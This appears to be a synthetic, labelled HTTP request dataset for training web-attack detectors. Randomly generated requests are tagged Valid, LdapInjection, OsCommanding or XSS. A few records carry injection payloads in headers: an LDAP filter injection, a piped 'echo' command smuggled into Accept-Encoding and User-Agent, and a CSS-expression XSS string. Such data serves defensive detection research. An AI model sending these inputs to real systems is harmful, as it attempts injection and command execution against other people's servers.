Client-ip: 46.57.174.208
Cookie: i7rtuha=8;tifys=627;t1aia6tsst=wwPH
Cookie2: $Version="969"
Date: Fri, 12 May 06 19:57:40 UTC
ETag: W/"Z2pOfs9CyNAb1oA"
Expect: 100-continue
From: rrhs@lfj0yeitrn.cz
If-Modified-Since: Thu, 03 Apr 08 15:08:59 UTC
If-Unmodified-Since: Sat, 10 Mar 07 03:31:59 CET
If-Match: "etzKibjKG@5x_kV7mcT"
If-None-Match: "TQpEZFkMn8Tg63MhZHnd"
If-Range: Sat, 12 Mar 05 22:15:38 GMT
Max-Forwards: 2251
MIME-Version: 3.9
Pragma: 94aO=tec4t
Proxy-Authorization: Basic b2FhaHVpZzpnMG5pdGhocg==
Authorization: NTLM ZW9vcmhJbGFvczdzZXRhZWVzcW40aWVvdG51ckVuZTN3cmRld2V0OWVDZWFlbg==
Range: -879498
Referer: /ri9gIe/eien1l/sEipe2gs.dll
TE: trailers,trailers
Trailer: Transfer-Encoding
User-Agent: cnhe/0.5.5.6.9
UA-CPU: 68000
UA-Disp: 071,871,8
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 894x439
Via: FTP/4.9 126.161.32.140:5696
Transfer-Encoding: compress
Upgrade: mAfhy/1.2, miweeu/5.9, cro/2.3, escale/8.3
Warning: 912 www.oae7p.js "tows0eecop" "Sun, 06 Nov 05 24:11:34 UTC"
X-Forwarded-For: 150.249.43.63
X-Serial-Number: 1603142835100231
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25377
Start - Id: 3020
class: Valid
GET /nG/hu5i_TLtpPuXo8xr7.PJ/Tskuheiioet9le/2LL2Fg/rgsrxoocOc9iarwnd3ws/shd/Nf2scriptQ-D6.cfm? HTTP/1.0
Host: 146.154.33.4
Connection: keep-alive
Accept: application/zip, application/x-tar
Accept-Charset: x-mac-greek;q=0.7, x-mac-icelandic, iso-8859-15;q=0.2
Accept-Encoding: gzip;q=0.4, identity;q=0.8, gzip;q=0.1, gzip;q=0.3, deflate;q=0.1
Accept-Language: *;q=0.6
Cache-Control: max-stale
Client-ip: 109.15.123.3
Cookie: @L2objectsAejs@qP=qndf;jW47_Y5Zddiv=l\h&ao7 htLgrcath;sutreve8=SArbi;soo33timm=28
Cookie2: $Version="951"
Date: Thu, 07 Oct 04 09:40:01 GMT
ETag: "qUHkNbL-yPO3IxUA"
Expect: euetit
From: Gnrp@qqtreOp.fr
If-Modified-Since: Thu, 07 Sep 06 19:29:21 UTC
If-Unmodified-Since: Tue, 29 Apr 08 14:04:57 CET
If-Match: *
If-None-Match: "UC1KvG3pfdVZ.cdYt"
If-Range: Tue, 18 Mar 08 04:39:20 GMT
Max-Forwards: 07
MIME-Version: 1.8
Pragma: no-cache
Proxy-Authorization: iaasI fdsn=2omiDleT
Authorization: Digest opaque="su8e"
Range: 37991-,-13
Referer: http://www.w0sle8.cz/qecn/14io.swf
TE: trailers,trailers,gzip
Trailer: Warning
User-Agent: eweEOernt/5.8.5.3.2
UA-CPU: StrongARM
UA-Disp: 767,9233,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 737x8655
Via: FTP/8.7 www.dsgiebns.css, 2.7 205.213.195.43:89418
Transfer-Encoding: identity
Upgrade: nenfhq/1.5, aiea/9.0, 8nTSn/3.7, sddt9/6.1
Warning: 788 169.251.130.184 "eeko" 
X-Forwarded-For: 34.221.232.228
X-Serial-Number: 32933233721
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3020
Start - Id: 37355
class: LdapInjection
GET /ewedtxxcM/tOkfZ/iQk0/0fl85potn/hdx1/ZyIxiddy/4GAX4vhQ4u@q4.bqljqa/j0zw/5KN7EyF.cfm?qetrscmumq=pscN&g77mfmm=leolYnrgtrolacnc&rEinsertallU=ilah&onydmDjfhy=920498081&Xehatrzjuf=9Et&1bF0tboot.inic=nt4guH++hnl&73xmj6@fs=eo%2FaSe+d&DrhsoSaMc=ghsnh&eenitS=eOtugi1tymbrr&Tusr7_5zMkYEbm=0038731212&wr=94721&rmuiGE=e%5Cmocha+0ocj&YNTUUR9sJX=shutdownen&eessnt=Ebetween2iutn HTTP/1.0
Host: www.TrJedd19u.uk:39
Connection: s84etet
Accept: image/*, audio/basic;q=0.2, image/*;q=0.4
Accept-Charset: *;q=0.6
Accept-Encoding: deflate;q=0.3, identity
Accept-Language: nms1t-eguEhoa, t8rrasr-eg, f-naedb
Cache-Control: cao=kn
Client-ip: 76.89.173.110
Cookie: tdibuesamRo=n87;mc3r_1=0
Cookie2: $Version="077"
Date: Tue, 28 Oct 08 18:03:53 GMT
ETag: "Plajhq16bNWrBgRCob"
Expect: 100-continue
If-Modified-Since: Sat, 15 May 04 24:46:18 GMT
If-Unmodified-Since: Fri, 07 May 04 12:52:32 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 557
MIME-Version: 8.7
Pragma: b4bujjta='td2eoz'
Proxy-Authorization: Basic c3NvdDpyQWFZM2FjdA==
Authorization: Basic cHBuZWRpZW86c2llbndz
Referer: http://www.osei.uk/pior2s.cgi
TE: trailers,trailers,gzip;q=0.8
Trailer: If-None-Match
User-Agent: ) (  |    (displayName=had*)   (name  =    had*   )(mail=had*    )
UA-Disp: 794,0889,32
UA-OS: Win98
UA-Color: color32
UA-Pixels: 5121x090
Via: FTP/4.5 www.Ssshnfd.shtml, FTP/7.4 199.115.120.100, 8.1 62.70.243.7
Transfer-Encoding: compress
Upgrade: nye/5.2, an7/9.2, eLcn/4.9, r0ox/4.5
Warning: 959 www.0nrnnbes.css:737 "merriuI" 
X-Forwarded-For: 231.143.90.28
X-Serial-Number: 854949447113384923
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 37355
Start - Id: 3536
class: Valid
GET /vQ@VhomexmlJ/t2g10YCbJJ7plmgJ/oKWjfH/ezihsalanoi/nttaVW4l5M/st/rn9htp5yn.js? HTTP/1.0
Host: www.af7sfg3dat.fr
Connection: twja
Accept: */*
Accept-Charset: *;q=0.6
Accept-Encoding: deflate, gzip, identity;q=0.5, compress;q=0.2
Accept-Language: *
Cache-Control: no-store
Client-ip: 222.249.123.200
Cookie: oclatewc9p=&eeh~hyoeLi r;yl8sme=leoautoexec|0amiwherebnf;qvze=5eoan9)Teit3dnch;jtgeaAxt=s;nfreilqtIini=981
Cookie2: $Version="26"
Date: Wed, 12 Jan 05 08:47:51 GMT
ETag: W/"GzK3OIJX9n_w7S0ueg"
Expect: eStieaii
From: en6o@GjeessSofa.org
If-Modified-Since: Sat, 25 Feb 06 19:53:23 CET
If-Unmodified-Since: Wed, 03 Sep 08 03:15:25 GMT
If-Match: *
If-None-Match: "NamU6d-YpXtc@Vo"
If-Range: Sat, 10 Jun 06 16:57:16 GMT
Max-Forwards: 594
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM MG1leGhuZW45OHRjOHlyT250ZXVHbGRtdGlpb2VjOWFzZGF0Y28=
Authorization: Basic dWlUZDpvUlVnZWE=
Range: 0-91,8335-51366
Referer: http://www.Lt4miesi.gov/oalorric/2Xhibrrn/rE6nesf6.gz
TE: deflate;q=0.7,gzip;q=0.7,trailers
Trailer: Date
User-Agent: fN29IuGF http://www.fEode.biz
UA-CPU: MIPS
UA-Disp: 782,802,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 5560x152
Via: FTP/4.3 217.45.8.110, FTP/5.3 www.aNlStnDN.css
Transfer-Encoding: eleoa
Upgrade: Srow/2.6, isahhr/6.2, ia9mfs/8.5, oogod/5.3, n6Lyi/6.7
Warning: 996 www.oioeoa.png "henuSrMevtewo9Rnoa2h" "Sun, 29 Nov 09 11:37:16 CET"
X-Forwarded-For: 233.242.107.236
X-Serial-Number: 78747
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 3536
Start - Id: 17503
class: Valid
GET /eYdQ38.wwyHrT5zj77Mg/7zaDiB/emieOrrsaaeCkaaoseh/s2RaeMneooirrkexd/ettaxktthjejoaofse/r9sncaEsreiuinoacri/njoj5-v/6.270cmd.exe?9isvMtoAeteuas=ikesAehne&nbaUo13=etcnieu%3CL%5Dingtone&thinmfcAl=67873660&phdarnh=6141&wlmrohln2uf=ma&cat_Bs62t3FE=1 HTTP/1.0
Host: www.rh2utf6xie.com
Connection: rne4youa
Accept: text/*, text/plain;q=0.1
Accept-Charset: windows-1254, x-mac-chinesesimp;q=0.0, windows-1257
Accept-Encoding: deflate;q=0.5, identity, deflate;q=0.9
Accept-Language: *
Cache-Control: no-cache
Client-ip: 252.240.14.144
Cookie: 2@HmetavMWvDt=198062621
Cookie2: $Version="132"
Date: Sun, 20 Aug 06 09:06:46 CET
ETag: "VfDQeglA-OWCeNU4sa"
Expect: 100-continue
From: roosohie@ineaersa7.com
If-Modified-Since: Sat, 21 Nov 09 20:24:50 UTC
If-Unmodified-Since: Mon, 07 Dec 09 13:32:50 GMT
If-Match: "NoolCNKpbtZMnZzRv"
If-None-Match: *
If-Range: *
Max-Forwards: 70
MIME-Version: 5.7
Pragma: 0='joi'
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: Digest cnonce="r5y8"
Range: 6-05,-0890
Referer: /gwidlbsm/a2nt7m.jsp
TE: trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/4.6 (compatible; Konqueror/8.2; WinNT; SeogtDiy)
UA-CPU: x86
UA-Disp: 646,6617,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6336x8003
Via: jsnsse/0.9 115.56.77.126
Transfer-Encoding: identity
Upgrade: wys/9.8, dwn/4.4
Warning: 717 www.sihute.js:411 "rxtlf8maScstprd2" "Mon, 15 Feb 10 02:09:14 CET"
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17503
Start - Id: 2945
class: Valid
GET /mopvcn/beeiia7f/srks4rpecnqhiry/d9E46jtDr-/mo.png? HTTP/1.0
Host: 124.107.200.63
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: deflate;q=0.9, compress, deflate
Accept-Language: lgpra-ie;q=0.5
Cache-Control: max-age=42
Client-ip: 253.84.5.170
Cookie: lu=hjntsehpitaieddn;c1rm2aedojinuo=04059934;efToRoo2=nutio1fafe?:aoe;Trcp27Pc4k=ersa0
Cookie2: $Version="800"
Date: Tue, 30 Jun 09 12:39:45 UTC
ETag: "kqymBXwIb4BDZBZzH"
Expect: 100-continue
From: Iohco@rBgrnzg.net
If-Modified-Since: Sat, 25 Oct 08 09:18:43 GMT
If-Unmodified-Since: Fri, 30 Apr 10 19:29:20 CET
If-Match: *
If-None-Match: ".QkNBCOtYfQ-kRqsQm"
If-Range: *
Max-Forwards: 3763
MIME-Version: 7.2
Pragma: e2ienesf=nm0les
Proxy-Authorization: Digest cnonce="si4s"
Authorization: Digest uri=http://dmLuuscn.gov/eiesatn/Aonlesl/tHDtrtt/iaeRb.png
Range: 88640-9956,7533-4307
Referer: http://www.Pe7pc3A.ch/oter.mpg
TE: gzip;q=0.1
Trailer: Date
User-Agent: Mozilla/8.0 (X11; U; Unix 4.7; ae-hi; rv:6.1.3) Gecko/41814921
UA-CPU: Sparc
UA-Disp: 7777,5626,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 202x8189
Via: HTTP/5.6 www.reeoirks.jpeg:8190
Transfer-Encoding: patuse; L7onr=ltaaet
Upgrade: Diah/3.5, rn3tnm/4.9, a5emrt/3.5, ic7/0.5, aehi/9.7
Warning: 909 147.139.214.46 "xasxjoeuPm2r3W" 
X-Forwarded-For: 251.157.153.85
X-Serial-Number: 1920071
----: ------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2945
Start - Id: 17502
class: Valid
GET /lPJbsRhKzh1i.h9kA/bcn9j6l9hys/nTDf-j_.@8HBzKfgcn/heioAha/kLr9Ab4_02ngdyc7f/1Ft/o@UNOwqiQoS-a8JSqFh/otc9/2Y9aA0TNnLiPJ.png?bmt=tp&nznOa=6195039&beee0opu=9&vo2a=o1slYlbqhaving6u&iayfmnlqemdibok=aehciilnRjecrle HTTP/1.0
Host: 152.196.15.35
Connection: emtk
Accept: text/xml;q=0.6, audio/*;q=0.5
Accept-Charset: utf-8, cp-950, iso-8859-15;q=0.2, x-mac-roman;q=0.8, iso-2022-jp;q=0.4
Accept-Encoding: *;q=0.4
Accept-Language: cwa-or;q=0.1, aa-qciel;q=0.0
Cache-Control: no-cache
Client-ip: 252.240.14.144
Cookie: 2@HmetavMWvDt=198062621
Cookie2: $Version="132"
Date: Sat, 11 Jul 09 14:42:16 GMT
ETag: "VfDQeglA-OWCeNU4sa"
Expect: 100-continue
From: eg1jIllr@0ndu.st
If-Modified-Since: Tue, 15 Nov 05 07:30:31 CET
If-Unmodified-Since: Mon, 07 Dec 09 13:32:50 GMT
If-Match: "NoolCNKpbtZMnZzRv"
If-None-Match: *
If-Range: *
Max-Forwards: 70
MIME-Version: 5.7
Pragma: 0='joi'
Proxy-Authorization: Basic YTFubDpleTFzbnVl
Authorization: Digest cnonce="r5y8"
Range: 6-05,-0890
Referer: /aeths/eluuwt.nsf
TE: trailers
Trailer: Proxy-Authorization
User-Agent: 6sJwrsRseU (ajVH4Jtn; mDHHTboE0; 1Q82RR7KE)
UA-CPU: x86
UA-Disp: 646,6617,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 6336x8003
Via: jsnsse/0.9 115.56.77.126
Transfer-Encoding: identity
Upgrade: wys/9.8, dwn/4.4
Warning: 717 www.sihute.js:411 "rxtlf8maScstprd2" "Mon, 15 Feb 10 02:09:14 CET"
X-Forwarded-For: 152.234.23.25
X-Serial-Number: 677288661240188705
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 17502
Start - Id: 10551
class: Valid
GET /dylarnj/OiuzoyLTnarvsudlE/tydEe1med/btooD/jD2zyyMpBTaVqrdmG/ed2/edelete6xIEMand/V6h9g-qsMqMmeta.css?lUKxRZ3.VW9@=d&aviSat9HS=18872&gRxNychild-v=nmoadkpsE9mt6&ntseNgeo=456&.gQPprocessing-instructionM4ftpL=254619700&easchm=a%24A5%25psenaoedevs&jodyOTukyo=lmFUZyAQ&ganOdtoIrmFAb=o4LZQfWRHd&i6s=nGcJ&per2udnti=nboot.inirisam&xtermQJrvW=99063&VuXgroup byztSt=dhavingj+imhomochas%258+lmstn&aR27aIOhielo=dtv&@KP89q-Uh=r7QiO HTTP/1.0
Host: 39.110.76.122:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.4
Accept-Encoding: compress;q=0.5, identity, deflate;q=0.8, identity;q=0.5, identity
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 219.6.105.217
Cookie: cedRHua8hD=616278;tsd3i2=e3t;dam9nxr9= wnsnz 0 s
Cookie2: $Version="06"
Date: Mon, 29 Mar 04 24:44:54 CET
ETag: "CmmphlPXs7s7Y7VrxWY"
Expect: ih5D4t=coayeu
From: i5rsee@eomcf7fb.cz
If-Modified-Since: Thu, 03 Jun 04 15:33:39 GMT
If-Unmodified-Since: Sat, 18 Dec 04 24:56:27 UTC
If-Match: *
If-None-Match: *
If-Range: Sun, 05 Mar 06 07:10:58 GMT
Max-Forwards: 9
MIME-Version: 1.6
Pragma: no-cache
Proxy-Authorization: Ithc Ynijwra=smrinc
Authorization: NTLM d2ViZGNiZW9peHltbHo3NHhzY3RvZ3JFRWVhYWRpZ2V5b2FzOQ==
Range: -028
Referer: http://www.0obiTnjn.it/sxjx/cEaU.sh
TE: gzip
Trailer: Date
User-Agent: aosphmoeu/5.9.6
UA-CPU: MIPS
UA-Disp: 7913,7267,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 4657x757
Via: FTP/6.2 81.11.136.57, HTTP/4.7 238.85.234.196
Transfer-Encoding: compress
Upgrade: aianh/8.9, rdvq9p/7.9, srh/6.2
Warning: 970 239.131.64.210 "rDauEepHyyetKrx" 
X-Forwarded-For: 161.230.166.5
X-Serial-Number: 72395720
----: ---------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 10551
Start - Id: 44556
class: OsCommanding
GET /eo7/yorwcwrEdeii/ezFh/c2-8kDwsGzV.cgi?7ihttp1LFXnYYI4=%3Ci&jRQXXQq=s5br50%7Cswaupdate&nw0tn=sxktdi&ayb4tpnnoeFsmh=t%3Dosd&indhR4nnfto=nr7axg&szypo=470132613&PshutdownrnZOL0G=dsmytiis&0mhr7=3niyaensE&aexwma1gelewamo=g%5Ca%26me+hNkstcopyan HTTP/1.0
Host: www.3eC5in.cz:1160
Connection: Arudhant
Accept: */*;q=0.8
Accept-Charset: *
Accept-Encoding: 177.189.71.4    |    echo "test" >evilfile.txt
Accept-Language: trde-oetweaqr
Cache-Control: no-store
Cookie: ueicecsdtuee=Tla 9ak;nato=s-Dnze-rsrthallE;iatgte=324724;tbtO=iHJIv7aN8KY;obt=5
Date: Tue, 03 Aug 04 04:34:32 UTC
Expect: ak7nvRa
If-Unmodified-Since: Sun, 03 Jan 10 18:36:47 GMT
If-Match: "_Dwz82dJBlMNLL5"
If-None-Match: "8oY9Pk1ZWqHM7YtgjNyb"
If-Range: Fri, 03 Aug 07 03:49:30 GMT
Max-Forwards: 733
MIME-Version: 1.3
Pragma: no-cache
Authorization: lnfhy doTnerr=Moooa
Referer: http://www.nTL6myol.de/C3dha6oo/TDnlhah/anSepmCn/sdhgio/iyewt.pl
TE: deflate;q=0.6,gzip
User-Agent: 49.203.104.198  |  echo "test" >evilfile.txt
Transfer-Encoding: jaol

null

End - Id: 44556
Start - Id: 10275
class: Valid
GET /olIyhtErts1Sd4Uoted/sst0hettdoae/eofibeaHUdveo4q/rwltrts3Ex.jpeg?s1aseNlhgiei=eff&bqeci2tes=47831&eonop=llscriptd&.oCYSNtKm=eOiebrOlatef&Idhtj=0eest&rgohAnueentr=3213&m1e=s%7Cf HTTP/1.1
Host: 209.160.86.242
Connection: jaeola
Accept: */*
Accept-Charset: x-mac-chinesesimp, x-mac-chinesetrad;q=0.9, x-mac-korean, koi8-r, iso-8859-8;q=0.8
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.0
Cache-Control: no-store
Client-ip: 197.186.92.237
Cookie: niohr=9960089470
Cookie2: $Version="28"
Date: Tue, 20 Oct 09 06:28:41 GMT
ETag: "BfreOJ3WE66pfgqBB"
Expect: 100-continue
From: mlnie@Efgdrtva.cz
If-Modified-Since: Thu, 20 Jul 06 20:15:35 UTC
If-Unmodified-Since: Fri, 11 Jun 04 24:08:22 GMT
If-Match: "OnqflmRm9gBKBW7Z"
If-None-Match: *
If-Range: *
Max-Forwards: 22
MIME-Version: 6.2
Pragma: no-cache
Proxy-Authorization: aaey nwedwzgh=faeaao
Authorization: Digest uri=http://mhueui.net/rridr5/9npsA/npaj/8risrb.tar.gz
Range: 48806-,859-40,-983
Referer: /hcesdirR/Mlbu.txt
TE: trailers
Trailer: If-Range
User-Agent: iucTlsen4d2t50R
UA-CPU: MIPS
UA-Disp: 118,0565,16
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 032x7737
Via: 2.0 150.112.197.243, 8.8 249.194.193.218
Transfer-Encoding: gzip
Upgrade: lxaa/1.4, oOw/0.1, hlr5e/7.5
Warning: 634 16.238.124.149 "sa9ongsw5ehotu5nns1i" "Wed, 15 Feb 06 17:28:54 CET"
X-Forwarded-For: 205.147.122.108
X-Serial-Number: 5538432
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 10275
Start - Id: 34714
class: Valid
POST /s.G0/Xy/e88vD9eVUK1Fnn/elrcp_JZmOSp6b_vH/vYP11Jbuu19wkpr1so/tuGWjir1.CfBH0KvD-t/iHde5D/i-Z22COT2/Ea/fI/kYXUvH@BXL1P5/NfromdropK@k6.jsp? HTTP/1.1
Content-Length: 249
Content-Language: u,ly,is
Content-Encoding: identity
Content-Location: http://www.iunoaovn.de/ell3C4th.mpg
Content-MD5: aXBuc3RzaXVjcnJpaGVsaA==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 20 Nov 08 10:42:14 UTC
Last-Modified: Tue, 31 May 05 08:28:40 UTC
Host: 12.137.141.0
Connection: close
Accept: */*;q=0.9
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=1983
Client-ip: 51.127.174.180
Cookie: ZbG9qhbdnetcatVmi=asylconnect;25nrce4=uziy6t0eness
Cookie2: $Version="0"
Date: Thu, 04 Mar 10 02:09:30 CET
ETag: "ghddgygvcZw2JBfz"
Expect: 100-continue
From: eegGaa@nxna0n.uk
If-Modified-Since: Sat, 14 Oct 06 22:09:30 GMT
If-Unmodified-Since: Wed, 24 Nov 04 01:00:37 UTC
If-Match: "d2R6@fMZh2GQv7oUis"
If-None-Match: "pd2lnoqdJQkYOfej7q"
If-Range: Wed, 27 Apr 05 17:58:52 UTC
Max-Forwards: 633
MIME-Version: 5.6
Pragma: aic=s
Proxy-Authorization: Digest realm
Authorization: oMaee6 eudjami=nlnieitl
Range: 27601-82680,576792-311040,-975285
Referer: /nmsoN/a7Dagm/3aAt/TGinrlo.cfm
TE: gzip;q=0.6,gzip;q=0.9
Trailer: Cache-Control
User-Agent: Mozilla/1.2 (Machintosh; U; Mac OS X 0.2; ca-tn; rv:2.9.9) Gecko/59308380
UA-CPU: x86
UA-Disp: 659,9099,16
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 420x8395
Via: FTP/1.3 www.nsnciaww.tiff, oioi8/2.7 83.236.182.171:1
Transfer-Encoding: identity
Upgrade: nq8o/9.4, hsea/1.7
Warning: 270 www.akhXhs.js "ogdA" "Wed, 23 Dec 09 01:56:59 UTC"
X-Forwarded-For: 102.210.121.17
X-Serial-Number: 70295990861852353496
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

oegrhdathl=3&roNzuc=8275910&Kvos@p_pJ=08388&nexbbmgl=35837897&eckir3ibRixh=75&mPJNHvmE=27731403&IrLl3W=aholnn&mepge=25108175&HhoPhavingp= wshutdownmYba|aieN&sgdpotrosbor3hh=495&slatX7atao=eyrEna-gE&saoisLb3d=vxtermT'&54aa=813&teElerolu6=m@6jy6

End - Id: 34714
Start - Id: 3356
class: Valid
GET /twget/esh/s3ssot/Eeeeueeasmneprfnahtt/pWTURoD.jsp?n0=fpFe0W3dd&dqo2ect=uege&Hbeyta=51890&awl=systemtdt&ingsaghtmeasezc=mu&nEphcds2q=t7cti&lMylbn=0u8tchildn%26oi&mAe41mDs1a=ihfneOphbwqTa5&yoI=59eBdkd0w-tg&deigygyth=oetuAveu&mlagattt1chon=7648156 HTTP/1.1
Host: 121.205.6.30
Connection: keep-alive
Accept: application/x-tar
Accept-Charset: iso-8859-4, euc-tw, koi8;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: u2e-n8pn;q=0.7
Cache-Control: max-stale
Client-ip: 91.183.159.230
Cookie: %uYOYCXG2=fteTisf1h;sdee=Fnvf;eintestCs=2909;ett2fg=9333;ctTIooOzteslR4=4
Cookie2: $Version="196"
Date: Wed, 08 Jun 05 07:11:02 CET
ETag: W/"KxURYhTtFDJH7KbtM3fZ"
Expect: 100-continue
From: rotrm@prr0Uaen9A.net
If-Modified-Since: Tue, 06 Jun 06 20:51:56 GMT
If-Unmodified-Since: Sun, 02 Jul 06 14:06:28 CET
If-Match: "1vnFa.QZSx7eoWaft"
If-None-Match: "z.u0X@d6qaPqW8b1W"
If-Range: "NaF-FJSALh4Uz4wuN40s"
Max-Forwards: 6
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: r2ymao sdha=rh3ozee
Authorization: NTLM b3RvcG5lcm1lemk2aXNtb3J0ZW5uYWVyZmxpdGJueXJlbkVucmRoaWlveG1taGdj
Range: -8,28-271041
Referer: /adiaiems/wdnnre/eafhev.mpeg
TE: trailers,trailers
Trailer: Referer
User-Agent: Mozilla/0.4 (Windows; U; Windows NT 1.5; to-5t; rv:7.7.5) Gecko/85673854
UA-CPU: x86
UA-Disp: 351,552,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 8795x2718
Via: HTTP/1.5 www.ruYend1F.png, HTTP/3.9 www.nOeteh.html
Transfer-Encoding: compress
Upgrade: yeec2/5.6, ruid/6.9, hk5h/6.6, gr6/5.3, hwts3p/7.9
Warning: 318 www.thxeOtH.gif "5umistbtjodse20isns" 
X-Forwarded-For: 253.99.67.7
X-Serial-Number: 8869070380
----: ---------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 3356
Start - Id: 4447
class: Valid
POST /hh4tytwhtatznmdMe2h/lobZ-thfOXiwUzu5/dZGmYO/gTP7TH5/qzlK1nW0sdREwhaU3/etFB4/KjmtKXsDK@.17wR/u.Q/hSall1YOF/aHEd0@XsR/te_5GKxO.lOPsif.js? HTTP/1.1
Content-Length: 142
Content-Language: 23
Content-Encoding: deflate
Content-Location: http://www.aesc.cz/mle9/suLslmkt/5aat5sy/etheE2.jpeg
Content-MD5: Y2dObHNtMnJ0YXdkb1NoaA==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 10 Apr 05 09:05:55 CET
Last-Modified: Thu, 20 Mar 08 12:55:35 GMT
Host: www.ntu3jhneh.net
Connection: close
Accept: */*;q=0.9
Accept-Charset: euc-kr, euc-tw, x-mac-chinesetrad, x-mac-icelandic, iso-8859-8;q=0.4
Accept-Encoding: identity;q=0.7
Accept-Language: e5hc-g
Cache-Control: no-transform
Client-ip: 158.211.9.8
Cookie: ioiosm=nWx;vaf=heuree;Hnbn=275966523
Cookie2: $Version="774"
Date: Tue, 07 Sep 04 24:14:03 CET
ETag: W/"eyTMj.yiuag60l0aTWR"
Expect: W9u3Rr=oeoit;Rrcabono=tnhrcw
From: onresk@onoddtq.be
If-Modified-Since: Thu, 13 Dec 07 21:55:55 CET
If-Unmodified-Since: Thu, 31 Aug 06 03:35:24 GMT
If-Match: *
If-None-Match: "oymN_bsCsyeuQfTMcwu"
If-Range: Sun, 28 Sep 08 24:03:28 UTC
Max-Forwards: 62
MIME-Version: 9.1
Pragma: e1gxqa='heqi'
Proxy-Authorization: NTLM b29lUmVEb3NlemFlaTlleXRtZWl0c2FzbGxza2g4NnJubnNp
Authorization: Basic c2VvRWVhY3M6dDR0aQ==
Range: 64421-813,254899-
Referer: /jaei/cxius/IThel/poQnd/sreashAt.cfm
TE: trailers,trailers
Trailer: Connection
User-Agent: i4iO@Z http://www.riubd8t.st
UA-CPU: StrongARM
UA-Disp: 5974,926,32
UA-OS: Linux
UA-Color: color16
UA-Pixels: 604x596
Via: 3.0 www.sqnys.tiff:40
Transfer-Encoding: compress
Upgrade: caueo/3.4, rif/5.0
Warning: 774 98.7.54.149 "snI8ejlpssn" "Tue, 19 Apr 05 06:05:00 CET"
X-Forwarded-For: 9.134.134.209
X-Serial-Number: 053208446
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

r5ntch7=cs9nssr>nftac&cu=lh)p5al2gchttps9m0mut&sRahtrtte=3&wnlOzHl3n5lge=r/'oj(dl bodytxgnq&ouaTmAeu=sp&0UxHbody0R=th&4o=tshroYlyPam

End - Id: 4447
Start - Id: 48187
class: XSS
POST /eOk1l/jeolbrew/sfyHijemmOdldNa1Ej.tiff? HTTP/1.1
Content-Length: 59
Content-Language: rTo23te
Content-Encoding: deflate
Content-Location: http://www.tiyt5gIe.be/oenbHEkk/ohedse/ongosjla/shNrr2.gif
Content-MD5: dXNoZWI5RWh1dGVsdGVyZg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Mar 07 06:37:10 UTC
Last-Modified: Sun, 19 Nov 06 24:42:52 GMT
Host: www.b9hreio.ch:80
Connection: mpo6lefm
Accept: application/postscript
Accept-Charset: *
Accept-Encoding: deflate, deflate, compress, deflate, gzip;q=0.8
Accept-Language: chrln     "     style=left:expression(alert(" oeltl.iS    ")) alt =    "
Cache-Control: no-store
Client-ip: 196.219.140.167
Cookie: tsty=h46ri;uebRi7lhdss=91572569;ydt15fl1uesc=424;ngday9stbene=7;AdN7WlJZechoQF=374
Cookie2: $Version="60"
Date: Mon, 19 Apr 04 09:40:16 UTC
ETag: "G5Xga2D5oCgA_1Wuuiq"
Expect: alo9v=ts9oerrr;si8nlg=taofacfO
From: umnoGes@ienl6i3a.biz
If-Modified-Since: Tue, 18 Dec 07 02:28:56 UTC
If-Unmodified-Since: Tue, 20 Jan 09 17:01:09 GMT
If-Match: *
If-None-Match: "TRMgnzViP9UbPppN4Y7"
If-Range: Sat, 10 Jul 04 09:42:18 GMT
Max-Forwards: 00
MIME-Version: 3.5
Pragma: no-cache
Proxy-Authorization: NTLM ZTlzaXNlaXhJaDBlQnZhbGVobXBlbHJkZnJwVXR0dDhobmFkeWFpbHRpZA==
Authorization: NTLM Y2FlNWF0cDJodGlvcjB3bW9pOW1zbGlBU2s4dGF0OGhvZWFydw==
Range: -1170
Referer: /d2ariiG/smhys/nrfwb.bin
TE: gzip,deflate;q=0.4,deflate;q=0.3
Trailer: Range
User-Agent: Mozilla/5.0 (X11; U; Unix 9.6; oo-en; rv:2.4.9) Gecko/00939602
UA-CPU: Sparc
UA-Disp: 6418,097,8
